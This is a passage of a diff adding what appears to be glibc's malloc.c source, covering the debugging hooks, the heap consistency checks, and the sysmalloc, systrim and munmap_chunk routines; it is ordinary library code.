+    set_max_fast (DEFAULT_MXFAST);
+  atomic_store_relaxed (&av->have_fastchunks, false);
+
+  av->top = initial_top (av);
+}
+
+/*
+   Other internal utilities operating on mstates
+ */
+
+static void *sysmalloc (INTERNAL_SIZE_T, mstate);
+static int      systrim (size_t, mstate);
+static void     malloc_consolidate (mstate);
+
+
+/* -------------- Early definitions for debugging hooks ---------------- */
+
+/* Define and initialize the hook variables.  These weak definitions must
+   appear before any use of the variables in a function (arena.c uses one).  */
+#ifndef weak_variable
+/* In GNU libc we want the hook variables to be weak definitions to
+   avoid a problem with Emacs.  */
+# define weak_variable weak_function
+#endif
+
+/* Forward declarations.  */
+static void *malloc_hook_ini (size_t sz,
+                              const void *caller) __THROW;
+static void *realloc_hook_ini (void *ptr, size_t sz,
+                               const void *caller) __THROW;
+static void *memalign_hook_ini (size_t alignment, size_t sz,
+                                const void *caller) __THROW;
+
+#if HAVE_MALLOC_INIT_HOOK
+void weak_variable (*__malloc_initialize_hook) (void) = NULL;
+compat_symbol (libc, __malloc_initialize_hook,
+	       __malloc_initialize_hook, GLIBC_2_0);
+#endif
+
+void weak_variable (*__free_hook) (void *__ptr,
+                                   const void *) = NULL;
+void *weak_variable (*__malloc_hook)
+  (size_t __size, const void *) = malloc_hook_ini;
+void *weak_variable (*__realloc_hook)
+  (void *__ptr, size_t __size, const void *)
+  = realloc_hook_ini;
+void *weak_variable (*__memalign_hook)
+  (size_t __alignment, size_t __size, const void *)
+  = memalign_hook_ini;
+void weak_variable (*__after_morecore_hook) (void) = NULL;
+
+/* This function is called from the arena shutdown hook, to free the
+   thread cache (if it exists).  */
+static void tcache_thread_shutdown (void);
+
+/* ------------------ Testing support ----------------------------------*/
+
+static int perturb_byte;
+
+static void
+alloc_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte ^ 0xff, n);
+}
+
+static void
+free_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte, n);
+}
+
+
+
+#include <stap-probe.h>
+
+/* ------------------- Support for multiple arenas -------------------- */
+#include "arena.c"
+
+/*
+   Debugging support
+
+   These routines make a number of assertions about the states
+   of data structures that should be true at all times. If any
+   are not true, it's very likely that a user program has somehow
+   trashed memory. (It's also possible that there is a coding error
+   in malloc. In which case, please report it!)
+ */
+
+#if !MALLOC_DEBUG
+
+# define check_chunk(A, P)
+# define check_free_chunk(A, P)
+# define check_inuse_chunk(A, P)
+# define check_remalloced_chunk(A, P, N)
+# define check_malloced_chunk(A, P, N)
+# define check_malloc_state(A)
+
+#else
+
+# define check_chunk(A, P)              do_check_chunk (A, P)
+# define check_free_chunk(A, P)         do_check_free_chunk (A, P)
+# define check_inuse_chunk(A, P)        do_check_inuse_chunk (A, P)
+# define check_remalloced_chunk(A, P, N) do_check_remalloced_chunk (A, P, N)
+# define check_malloced_chunk(A, P, N)   do_check_malloced_chunk (A, P, N)
+# define check_malloc_state(A)         do_check_malloc_state (A)
+
+/*
+   Properties of all chunks
+ */
+
+static void
+do_check_chunk (mstate av, mchunkptr p)
+{
+  unsigned long sz = chunksize (p);
+  /* min and max possible addresses assuming contiguous allocation */
+  char *max_address = (char *) (av->top) + chunksize (av->top);
+  char *min_address = max_address - av->system_mem;
+
+  if (!chunk_is_mmapped (p))
+    {
+      /* Has legal address ... */
+      if (p != av->top)
+        {
+          if (contiguous (av))
+            {
+              assert (((char *) p) >= min_address);
+              assert (((char *) p + sz) <= ((char *) (av->top)));
+            }
+        }
+      else
+        {
+          /* top size is always at least MINSIZE */
+          assert ((unsigned long) (sz) >= MINSIZE);
+          /* top predecessor always marked inuse */
+          assert (prev_inuse (p));
+        }
+    }
+  else if (!DUMPED_MAIN_ARENA_CHUNK (p))
+    {
+      /* address is outside main heap  */
+      if (contiguous (av) && av->top != initial_top (av))
+        {
+          assert (((char *) p) < min_address || ((char *) p) >= max_address);
+        }
+      /* chunk is page-aligned */
+      assert (((prev_size (p) + sz) & (GLRO (dl_pagesize) - 1)) == 0);
+      /* mem is aligned */
+      assert (aligned_OK (chunk2mem (p)));
+    }
+}
+
+/*
+   Properties of free chunks
+ */
+
+static void
+do_check_free_chunk (mstate av, mchunkptr p)
+{
+  INTERNAL_SIZE_T sz = chunksize_nomask (p) & ~(PREV_INUSE | NON_MAIN_ARENA);
+  mchunkptr next = chunk_at_offset (p, sz);
+
+  do_check_chunk (av, p);
+
+  /* Chunk must claim to be free ... */
+  assert (!inuse (p));
+  assert (!chunk_is_mmapped (p));
+
+  /* Unless a special marker, must have OK fields */
+  if ((unsigned long) (sz) >= MINSIZE)
+    {
+      assert ((sz & MALLOC_ALIGN_MASK) == 0);
+      assert (aligned_OK (chunk2mem (p)));
+      /* ... matching footer field */
+      assert (prev_size (next_chunk (p)) == sz);
+      /* ... and is fully consolidated */
+      assert (prev_inuse (p));
+      assert (next == av->top || inuse (next));
+
+      /* ... and has minimally sane links */
+      assert (p->fd->bk == p);
+      assert (p->bk->fd == p);
+    }
+  else /* markers are always of size SIZE_SZ */
+    assert (sz == SIZE_SZ);
+}
+
+/*
+   Properties of inuse chunks
+ */
+
+static void
+do_check_inuse_chunk (mstate av, mchunkptr p)
+{
+  mchunkptr next;
+
+  do_check_chunk (av, p);
+
+  if (chunk_is_mmapped (p))
+    return; /* mmapped chunks have no next/prev */
+
+  /* Check whether it claims to be in use ... */
+  assert (inuse (p));
+
+  next = next_chunk (p);
+
+  /* ... and is surrounded by OK chunks.
+     Since more things can be checked with free chunks than inuse ones,
+     if an inuse chunk borders them and debug is on, it's worth doing them.
+   */
+  if (!prev_inuse (p))
+    {
+      /* Note that we cannot even look at prev unless it is not inuse */
+      mchunkptr prv = prev_chunk (p);
+      assert (next_chunk (prv) == p);
+      do_check_free_chunk (av, prv);
+    }
+
+  if (next == av->top)
+    {
+      assert (prev_inuse (next));
+      assert (chunksize (next) >= MINSIZE);
+    }
+  else if (!inuse (next))
+    do_check_free_chunk (av, next);
+}
+
+/*
+   Properties of chunks recycled from fastbins
+ */
+
+static void
+do_check_remalloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  INTERNAL_SIZE_T sz = chunksize_nomask (p) & ~(PREV_INUSE | NON_MAIN_ARENA);
+
+  if (!chunk_is_mmapped (p))
+    {
+      assert (av == arena_for_chunk (p));
+      if (chunk_main_arena (p))
+        assert (av == &main_arena);
+      else
+        assert (av != &main_arena);
+    }
+
+  do_check_inuse_chunk (av, p);
+
+  /* Legal size ... */
+  assert ((sz & MALLOC_ALIGN_MASK) == 0);
+  assert ((unsigned long) (sz) >= MINSIZE);
+  /* ... and alignment */
+  assert (aligned_OK (chunk2mem (p)));
+  /* chunk is less than MINSIZE more than request */
+  assert ((long) (sz) - (long) (s) >= 0);
+  assert ((long) (sz) - (long) (s + MINSIZE) < 0);
+}
+
+/*
+   Properties of nonrecycled chunks at the point they are malloced
+ */
+
+static void
+do_check_malloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  /* same as recycled case ... */
+  do_check_remalloced_chunk (av, p, s);
+
+  /*
+     ... plus,  must obey implementation invariant that prev_inuse is
+     always true of any allocated chunk; i.e., that each allocated
+     chunk borders either a previously allocated and still in-use
+     chunk, or the base of its memory arena. This is ensured
+     by making all allocations from the `lowest' part of any found
+     chunk.  This does not necessarily hold however for chunks
+     recycled via fastbins.
+   */
+
+  assert (prev_inuse (p));
+}
+
+
+/*
+   Properties of malloc_state.
+
+   This may be useful for debugging malloc, as well as detecting user
+   programmer errors that somehow write into malloc_state.
+
+   If you are extending or experimenting with this malloc, you can
+   probably figure out how to hack this routine to print out or
+   display chunk addresses, sizes, bins, and other instrumentation.
+ */
+
+static void
+do_check_malloc_state (mstate av)
+{
+  int i;
+  mchunkptr p;
+  mchunkptr q;
+  mbinptr b;
+  unsigned int idx;
+  INTERNAL_SIZE_T size;
+  unsigned long total = 0;
+  int max_fast_bin;
+
+  /* internal size_t must be no wider than pointer type */
+  assert (sizeof (INTERNAL_SIZE_T) <= sizeof (char *));
+
+  /* alignment is a power of 2 */
+  assert ((MALLOC_ALIGNMENT & (MALLOC_ALIGNMENT - 1)) == 0);
+
+  /* Check the arena is initialized. */
+  assert (av->top != 0);
+
+  /* No memory has been allocated yet, so doing more tests is not possible.  */
+  if (av->top == initial_top (av))
+    return;
+
+  /* pagesize is a power of 2 */
+  assert (powerof2(GLRO (dl_pagesize)));
+
+  /* A contiguous main_arena is consistent with sbrk_base.  */
+  if (av == &main_arena && contiguous (av))
+    assert ((char *) mp_.sbrk_base + av->system_mem ==
+            (char *) av->top + chunksize (av->top));
+
+  /* properties of fastbins */
+
+  /* max_fast is in allowed range */
+  assert ((get_max_fast () & ~1) <= request2size (MAX_FAST_SIZE));
+
+  max_fast_bin = fastbin_index (get_max_fast ());
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      p = fastbin (av, i);
+
+      /* The following test can only be performed for the main arena.
+         While mallopt calls malloc_consolidate to get rid of all fast
+         bins (especially those larger than the new maximum) this does
+         only happen for the main arena.  Trying to do this for any
+         other arena would mean those arenas have to be locked and
+         malloc_consolidate be called for them.  This is excessive.  And
+         even if this is acceptable to somebody it still cannot solve
+         the problem completely since if the arena is locked a
+         concurrent malloc call might create a new arena which then
+         could use the newly invalid fast bins.  */
+
+      /* all bins past max_fast are empty */
+      if (av == &main_arena && i > max_fast_bin)
+        assert (p == 0);
+
+      while (p != 0)
+        {
+          /* each chunk claims to be inuse */
+          do_check_inuse_chunk (av, p);
+          total += chunksize (p);
+          /* chunk belongs in this bin */
+          assert (fastbin_index (chunksize (p)) == i);
+          p = p->fd;
+        }
+    }
+
+  /* check normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+
+      /* binmap is accurate (except for bin 1 == unsorted_chunks) */
+      if (i >= 2)
+        {
+          unsigned int binbit = get_binmap (av, i);
+          int empty = last (b) == b;
+          if (!binbit)
+            assert (empty);
+          else if (!empty)
+            assert (binbit);
+        }
+
+      for (p = last (b); p != b; p = p->bk)
+        {
+          /* each chunk claims to be free */
+          do_check_free_chunk (av, p);
+          size = chunksize (p);
+          total += size;
+          if (i >= 2)
+            {
+              /* chunk belongs in bin */
+              idx = bin_index (size);
+              assert (idx == i);
+              /* lists are sorted */
+              assert (p->bk == b ||
+                      (unsigned long) chunksize (p->bk) >= (unsigned long) chunksize (p));
+
+              if (!in_smallbin_range (size))
+                {
+                  if (p->fd_nextsize != NULL)
+                    {
+                      if (p->fd_nextsize == p)
+                        assert (p->bk_nextsize == p);
+                      else
+                        {
+                          if (p->fd_nextsize == first (b))
+                            assert (chunksize (p) < chunksize (p->fd_nextsize));
+                          else
+                            assert (chunksize (p) > chunksize (p->fd_nextsize));
+
+                          if (p == first (b))
+                            assert (chunksize (p) > chunksize (p->bk_nextsize));
+                          else
+                            assert (chunksize (p) < chunksize (p->bk_nextsize));
+                        }
+                    }
+                  else
+                    assert (p->bk_nextsize == NULL);
+                }
+            }
+          else if (!in_smallbin_range (size))
+            assert (p->fd_nextsize == NULL && p->bk_nextsize == NULL);
+          /* chunk is followed by a legal chain of inuse chunks */
+          for (q = next_chunk (p);
+               (q != av->top && inuse (q) &&
+                (unsigned long) (chunksize (q)) >= MINSIZE);
+               q = next_chunk (q))
+            do_check_inuse_chunk (av, q);
+        }
+    }
+
+  /* top chunk is OK */
+  check_chunk (av, av->top);
+}
+#endif
+
+
+/* ----------------- Support for debugging hooks -------------------- */
+#include "hooks.c"
+
+
+/* ----------- Routines dealing with system allocation -------------- */
+
+/*
+   sysmalloc handles malloc cases requiring more memory from the system.
+   On entry, it is assumed that av->top does not have enough
+   space to service request for nb bytes, thus requiring that av->top
+   be extended or replaced.
+ */
+
+static void *
+sysmalloc (INTERNAL_SIZE_T nb, mstate av)
+{
+  mchunkptr old_top;              /* incoming value of av->top */
+  INTERNAL_SIZE_T old_size;       /* its size */
+  char *old_end;                  /* its end address */
+
+  long size;                      /* arg to first MORECORE or mmap call */
+  char *brk;                      /* return value from MORECORE */
+
+  long correction;                /* arg to 2nd MORECORE call */
+  char *snd_brk;                  /* 2nd return val */
+
+  INTERNAL_SIZE_T front_misalign; /* unusable bytes at front of new space */
+  INTERNAL_SIZE_T end_misalign;   /* partial page left at end of new space */
+  char *aligned_brk;              /* aligned offset into brk */
+
+  mchunkptr p;                    /* the allocated/returned chunk */
+  mchunkptr remainder;            /* remainder from allocation */
+  unsigned long remainder_size;   /* its size */
+
+
+  size_t pagesize = GLRO (dl_pagesize);
+  bool tried_mmap = false;
+
+
+  /*
+     If have mmap, and the request size meets the mmap threshold, and
+     the system supports mmap, and there are few enough currently
+     allocated mmapped regions, try to directly map this request
+     rather than expanding top.
+   */
+
+  if (av == NULL
+      || ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold)
+	  && (mp_.n_mmaps < mp_.n_mmaps_max)))
+    {
+      char *mm;           /* return value from mmap call*/
+
+    try_mmap:
+      /*
+         Round up size to nearest page.  For mmapped chunks, the overhead
+         is one SIZE_SZ unit larger than for normal chunks, because there
+         is no following chunk whose prev_size field could be used.
+
+         See the front_misalign handling below, for glibc there is no
+         need for further alignments unless we have have high alignment.
+       */
+      if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+        size = ALIGN_UP (nb + SIZE_SZ, pagesize);
+      else
+        size = ALIGN_UP (nb + SIZE_SZ + MALLOC_ALIGN_MASK, pagesize);
+      tried_mmap = true;
+
+      /* Don't try if size wraps around 0 */
+      if ((unsigned long) (size) > (unsigned long) (nb))
+        {
+          mm = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+          if (mm != MAP_FAILED)
+            {
+              /*
+                 The offset to the start of the mmapped region is stored
+                 in the prev_size field of the chunk. This allows us to adjust
+                 returned start address to meet alignment requirements here
+                 and in memalign(), and still be able to compute proper
+                 address argument for later munmap in free() and realloc().
+               */
+
+              if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                {
+                  /* For glibc, chunk2mem increases the address by 2*SIZE_SZ and
+                     MALLOC_ALIGN_MASK is 2*SIZE_SZ-1.  Each mmap'ed area is page
+                     aligned and therefore definitely MALLOC_ALIGN_MASK-aligned.  */
+                  assert (((INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK) == 0);
+                  front_misalign = 0;
+                }
+              else
+                front_misalign = (INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK;
+              if (front_misalign > 0)
+                {
+                  correction = MALLOC_ALIGNMENT - front_misalign;
+                  p = (mchunkptr) (mm + correction);
+		  set_prev_size (p, correction);
+                  set_head (p, (size - correction) | IS_MMAPPED);
+                }
+              else
+                {
+                  p = (mchunkptr) mm;
+		  set_prev_size (p, 0);
+                  set_head (p, size | IS_MMAPPED);
+                }
+
+              /* update statistics */
+
+              int new = atomic_exchange_and_add (&mp_.n_mmaps, 1) + 1;
+              atomic_max (&mp_.max_n_mmaps, new);
+
+              unsigned long sum;
+              sum = atomic_exchange_and_add (&mp_.mmapped_mem, size) + size;
+              atomic_max (&mp_.max_mmapped_mem, sum);
+
+              check_chunk (av, p);
+
+              return chunk2mem (p);
+            }
+        }
+    }
+
+  /* There are no usable arenas and mmap also failed.  */
+  if (av == NULL)
+    return 0;
+
+  /* Record incoming configuration of top */
+
+  old_top = av->top;
+  old_size = chunksize (old_top);
+  old_end = (char *) (chunk_at_offset (old_top, old_size));
+
+  brk = snd_brk = (char *) (MORECORE_FAILURE);
+
+  /*
+     If not the first time through, we require old_size to be
+     at least MINSIZE and to have prev_inuse set.
+   */
+
+  assert ((old_top == initial_top (av) && old_size == 0) ||
+          ((unsigned long) (old_size) >= MINSIZE &&
+           prev_inuse (old_top) &&
+           ((unsigned long) old_end & (pagesize - 1)) == 0));
+
+  /* Precondition: not enough current space to satisfy nb request */
+  assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE));
+
+
+  if (av != &main_arena)
+    {
+      heap_info *old_heap, *heap;
+      size_t old_heap_size;
+
+      /* First try to extend the current heap. */
+      old_heap = heap_for_ptr (old_top);
+      old_heap_size = old_heap->size;
+      if ((long) (MINSIZE + nb - old_size) > 0
+          && grow_heap (old_heap, MINSIZE + nb - old_size) == 0)
+        {
+          av->system_mem += old_heap->size - old_heap_size;
+          set_head (old_top, (((char *) old_heap + old_heap->size) - (char *) old_top)
+                    | PREV_INUSE);
+        }
+      else if ((heap = new_heap (nb + (MINSIZE + sizeof (*heap)), mp_.top_pad)))
+        {
+          /* Use a newly allocated heap.  */
+          heap->ar_ptr = av;
+          heap->prev = old_heap;
+          av->system_mem += heap->size;
+          /* Set up the new top.  */
+          top (av) = chunk_at_offset (heap, sizeof (*heap));
+          set_head (top (av), (heap->size - sizeof (*heap)) | PREV_INUSE);
+
+          /* Setup fencepost and free the old top chunk with a multiple of
+             MALLOC_ALIGNMENT in size. */
+          /* The fencepost takes at least MINSIZE bytes, because it might
+             become the top chunk again later.  Note that a footer is set
+             up, too, although the chunk is marked in use. */
+          old_size = (old_size - MINSIZE) & ~MALLOC_ALIGN_MASK;
+          set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ), 0 | PREV_INUSE);
+          if (old_size >= MINSIZE)
+            {
+              set_head (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ));
+              set_head (old_top, old_size | PREV_INUSE | NON_MAIN_ARENA);
+              _int_free (av, old_top, 1);
+            }
+          else
+            {
+              set_head (old_top, (old_size + 2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (old_top, (old_size + 2 * SIZE_SZ));
+            }
+        }
+      else if (!tried_mmap)
+        /* We can at least try to use to mmap memory.  */
+        goto try_mmap;
+    }
+  else     /* av == main_arena */
+
+
+    { /* Request enough space for nb + pad + overhead */
+      size = nb + mp_.top_pad + MINSIZE;
+
+      /*
+         If contiguous, we can subtract out existing space that we hope to
+         combine with new space. We add it back later only if
+         we don't actually get contiguous space.
+       */
+
+      if (contiguous (av))
+        size -= old_size;
+
+      /*
+         Round to a multiple of page size.
+         If MORECORE is not contiguous, this ensures that we only call it
+         with whole-page arguments.  And if MORECORE is contiguous and
+         this is not first time through, this preserves page-alignment of
+         previous calls. Otherwise, we correct to page-align below.
+       */
+
+      size = ALIGN_UP (size, pagesize);
+
+      /*
+         Don't try to call MORECORE if argument is so big as to appear
+         negative. Note that since mmap takes size_t arg, it may succeed
+         below even if we cannot call MORECORE.
+       */
+
+      if (size > 0)
+        {
+          brk = (char *) (MORECORE (size));
+          LIBC_PROBE (memory_sbrk_more, 2, brk, size);
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          /* Call the `morecore' hook if necessary.  */
+          void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+          if (__builtin_expect (hook != NULL, 0))
+            (*hook)();
+        }
+      else
+        {
+          /*
+             If have mmap, try using it as a backup when MORECORE fails or
+             cannot be used. This is worth doing on systems that have "holes" in
+             address space, so sbrk cannot extend to give contiguous space, but
+             space is available elsewhere.  Note that we ignore mmap max count
+             and threshold limits, since the space will not be used as a
+             segregated mmap region.
+           */
+
+          /* Cannot merge with old top, so add its size back in */
+          if (contiguous (av))
+            size = ALIGN_UP (size + old_size, pagesize);
+
+          /* If we are relying on mmap as backup, then use larger units */
+          if ((unsigned long) (size) < (unsigned long) (MMAP_AS_MORECORE_SIZE))
+            size = MMAP_AS_MORECORE_SIZE;
+
+          /* Don't try if size wraps around 0 */
+          if ((unsigned long) (size) > (unsigned long) (nb))
+            {
+              char *mbrk = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+              if (mbrk != MAP_FAILED)
+                {
+                  /* We do not need, and cannot use, another sbrk call to find end */
+                  brk = mbrk;
+                  snd_brk = brk + size;
+
+                  /*
+                     Record that we no longer have a contiguous sbrk region.
+                     After the first time mmap is used as backup, we do not
+                     ever rely on contiguous space since this could incorrectly
+                     bridge regions.
+                   */
+                  set_noncontiguous (av);
+                }
+            }
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          if (mp_.sbrk_base == 0)
+            mp_.sbrk_base = brk;
+          av->system_mem += size;
+
+          /*
+             If MORECORE extends previous space, we can likewise extend top size.
+           */
+
+          if (brk == old_end && snd_brk == (char *) (MORECORE_FAILURE))
+            set_head (old_top, (size + old_size) | PREV_INUSE);
+
+          else if (contiguous (av) && old_size && brk < old_end)
+	    /* Oops!  Someone else killed our space..  Can't touch anything.  */
+	    malloc_printerr ("break adjusted to free malloc space");
+
+          /*
+             Otherwise, make adjustments:
+
+           * If the first time through or noncontiguous, we need to call sbrk
+              just to find out where the end of memory lies.
+
+           * We need to ensure that all returned chunks from malloc will meet
+              MALLOC_ALIGNMENT
+
+           * If there was an intervening foreign sbrk, we need to adjust sbrk
+              request size to account for fact that we will not be able to
+              combine new space with existing space in old_top.
+
+           * Almost all systems internally allocate whole pages at a time, in
+              which case we might as well use the whole last page of request.
+              So we allocate enough more memory to hit a page boundary now,
+              which in turn causes future contiguous calls to page-align.
+           */
+
+          else
+            {
+              front_misalign = 0;
+              end_misalign = 0;
+              correction = 0;
+              aligned_brk = brk;
+
+              /* handle contiguous cases */
+              if (contiguous (av))
+                {
+                  /* Count foreign sbrk as system_mem.  */
+                  if (old_size)
+                    av->system_mem += brk - old_end;
+
+                  /* Guarantee alignment of first new chunk made from this space */
+
+                  front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                  if (front_misalign > 0)
+                    {
+                      /*
+                         Skip over some bytes to arrive at an aligned position.
+                         We don't need to specially mark these wasted front bytes.
+                         They will never be accessed anyway because
+                         prev_inuse of av->top (and any chunk created from its start)
+                         is always true after initialization.
+                       */
+
+                      correction = MALLOC_ALIGNMENT - front_misalign;
+                      aligned_brk += correction;
+                    }
+
+                  /*
+                     If this isn't adjacent to existing space, then we will not
+                     be able to merge with old_top space, so must add to 2nd request.
+                   */
+
+                  correction += old_size;
+
+                  /* Extend the end address to hit a page boundary */
+                  end_misalign = (INTERNAL_SIZE_T) (brk + size + correction);
+                  correction += (ALIGN_UP (end_misalign, pagesize)) - end_misalign;
+
+                  assert (correction >= 0);
+                  snd_brk = (char *) (MORECORE (correction));
+
+                  /*
+                     If can't allocate correction, try to at least find out current
+                     brk.  It might be enough to proceed without failing.
+
+                     Note that if second sbrk did NOT fail, we assume that space
+                     is contiguous with first sbrk. This is a safe assumption unless
+                     program is multithreaded but doesn't use locks and a foreign sbrk
+                     occurred between our first and second calls.
+                   */
+
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      correction = 0;
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                  else
+                    {
+                      /* Call the `morecore' hook if necessary.  */
+                      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+                      if (__builtin_expect (hook != NULL, 0))
+                        (*hook)();
+                    }
+                }
+
+              /* handle non-contiguous cases */
+              else
+                {
+                  if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                    /* MORECORE/mmap must correctly align */
+                    assert (((unsigned long) chunk2mem (brk) & MALLOC_ALIGN_MASK) == 0);
+                  else
+                    {
+                      front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                      if (front_misalign > 0)
+                        {
+                          /*
+                             Skip over some bytes to arrive at an aligned position.
+                             We don't need to specially mark these wasted front bytes.
+                             They will never be accessed anyway because
+                             prev_inuse of av->top (and any chunk created from its start)
+                             is always true after initialization.
+                           */
+
+                          aligned_brk += MALLOC_ALIGNMENT - front_misalign;
+                        }
+                    }
+
+                  /* Find out current end of memory */
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                }
+
+              /* Adjust top based on results of second sbrk */
+              if (snd_brk != (char *) (MORECORE_FAILURE))
+                {
+                  av->top = (mchunkptr) aligned_brk;
+                  set_head (av->top, (snd_brk - aligned_brk + correction) | PREV_INUSE);
+                  av->system_mem += correction;
+
+                  /*
+                     If not the first time through, we either have a
+                     gap due to foreign sbrk or a non-contiguous region.  Insert a
+                     double fencepost at old_top to prevent consolidation with space
+                     we don't own. These fenceposts are artificial chunks that are
+                     marked as inuse and are in any case too small to use.  We need
+                     two to make sizes and alignments work out.
+                   */
+
+                  if (old_size != 0)
+                    {
+                      /*
+                         Shrink old_top to insert fenceposts, keeping size a
+                         multiple of MALLOC_ALIGNMENT. We know there is at least
+                         enough space in old_top to do this.
+                       */
+                      old_size = (old_size - 4 * SIZE_SZ) & ~MALLOC_ALIGN_MASK;
+                      set_head (old_top, old_size | PREV_INUSE);
+
+                      /*
+                         Note that the following assignments completely overwrite
+                         old_top when old_size was previously MINSIZE.  This is
+                         intentional. We need the fencepost, even if old_top otherwise gets
+                         lost.
+                       */
+		      set_head (chunk_at_offset (old_top, old_size),
+				(2 * SIZE_SZ) | PREV_INUSE);
+		      set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ),
+				(2 * SIZE_SZ) | PREV_INUSE);
+
+                      /* If possible, release the rest. */
+                      if (old_size >= MINSIZE)
+                        {
+                          _int_free (av, old_top, 1);
+                        }
+                    }
+                }
+            }
+        }
+    } /* if (av !=  &main_arena) */
+
+  if ((unsigned long) av->system_mem > (unsigned long) (av->max_system_mem))
+    av->max_system_mem = av->system_mem;
+  check_malloc_state (av);
+
+  /* finally, do the allocation */
+  p = av->top;
+  size = chunksize (p);
+
+  /* check that one of the above allocation paths succeeded */
+  if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+    {
+      remainder_size = size - nb;
+      remainder = chunk_at_offset (p, nb);
+      av->top = remainder;
+      set_head (p, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE);
+      check_malloced_chunk (av, p, nb);
+      return chunk2mem (p);
+    }
+
+  /* catch all failure paths */
+  __set_errno (ENOMEM);
+  return 0;
+}
+
+
+/*
+   systrim is an inverse of sorts to sysmalloc.  It gives memory back
+   to the system (via negative arguments to sbrk) if there is unused
+   memory at the `high' end of the malloc pool. It is called
+   automatically by free() when top space exceeds the trim
+   threshold. It is also called by the public malloc_trim routine.  It
+   returns 1 if it actually released any memory, else 0.
+ */
+
+static int
+systrim (size_t pad, mstate av)
+{
+  long top_size;         /* Amount of top-most memory */
+  long extra;            /* Amount to release */
+  long released;         /* Amount actually released */
+  char *current_brk;     /* address returned by pre-check sbrk call */
+  char *new_brk;         /* address returned by post-check sbrk call */
+  size_t pagesize;
+  long top_area;
+
+  pagesize = GLRO (dl_pagesize);
+  top_size = chunksize (av->top);
+
+  top_area = top_size - MINSIZE - 1;
+  if (top_area <= pad)
+    return 0;
+
+  /* Release in pagesize units and round down to the nearest page.  */
+  extra = ALIGN_DOWN(top_area - pad, pagesize);
+
+  if (extra == 0)
+    return 0;
+
+  /*
+     Only proceed if end of memory is where we last set it.
+     This avoids problems if there were foreign sbrk calls.
+   */
+  current_brk = (char *) (MORECORE (0));
+  if (current_brk == (char *) (av->top) + top_size)
+    {
+      /*
+         Attempt to release memory. We ignore MORECORE return value,
+         and instead call again to find out where new end of memory is.
+         This avoids problems if first call releases less than we asked,
+         of if failure somehow altered brk value. (We could still
+         encounter problems if it altered brk in some very bad way,
+         but the only thing we can do is adjust anyway, which will cause
+         some downstream failure.)
+       */
+
+      MORECORE (-extra);
+      /* Call the `morecore' hook if necessary.  */
+      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+      if (__builtin_expect (hook != NULL, 0))
+        (*hook)();
+      new_brk = (char *) (MORECORE (0));
+
+      LIBC_PROBE (memory_sbrk_less, 2, new_brk, extra);
+
+      if (new_brk != (char *) MORECORE_FAILURE)
+        {
+          released = (long) (current_brk - new_brk);
+
+          if (released != 0)
+            {
+              /* Success. Adjust top. */
+              av->system_mem -= released;
+              set_head (av->top, (top_size - released) | PREV_INUSE);
+              check_malloc_state (av);
+              return 1;
+            }
+        }
+    }
+  return 0;
+}
+
+static void
+munmap_chunk (mchunkptr p)
+{
+  INTERNAL_SIZE_T size = chunksize (p);
+
+  assert (chunk_is_mmapped (p));
+
+  /* Do nothing if the chunk is a faked mmapped chunk in the dumped
+     main arena.  We never free this memory.  */
+  if (DUMPED_MAIN_ARENA_CHUNK (p))
+    return;
+
+  uintptr_t block = (uintptr_t) p - prev_size (p);
+  size_t total_size = prev_size (p) + size;
+  /* Unfortunately we have to do the compilers job by hand here.  Normally
+     we would test BLOCK and TOTAL-SIZE separately for compliance with the
+     page size.  But gcc does not recognize the optimization possibility
+     (in the moment at least) so we combine the two values into one before
+     the bit test.  */
+  if (__builtin_expect (((block | total_size) & (GLRO (dl_pagesize) - 1)) != 0, 0))
+    malloc_printerr ("munmap_chunk(): invalid pointer");
+
+  atomic_decrement (&mp_.n_mmaps);
+  atomic_add (&mp_.mmapped_mem, -total_size);
+
+  /* If munmap failed the process virtual memory address space is in a
+     bad shape.  Just leave the block hanging around, the process will
+     terminate shortly anyway since not much can be done.  */
+  __munmap ((char *) block, total_size);
+}
+
+#if HAVE_MREMAP
+
+static mchunkptr
+mremap_chunk (mchunkptr p, size_t new_size)
+{
+  size_t pagesize = GLRO (dl_pagesize);
+  INTERNAL_SIZE_T offset = prev_size (p);
+  INTERNAL_SIZE_T size = chunksize (p);
+  char *cp;
+
+  assert (chunk_is_mmapped (p));
+  assert (((size + offset) & (GLRO (dl_pagesize) - 1)) == 0);
+
+  /* Note the extra SIZE_SZ overhead as in mmap_chunk(). */
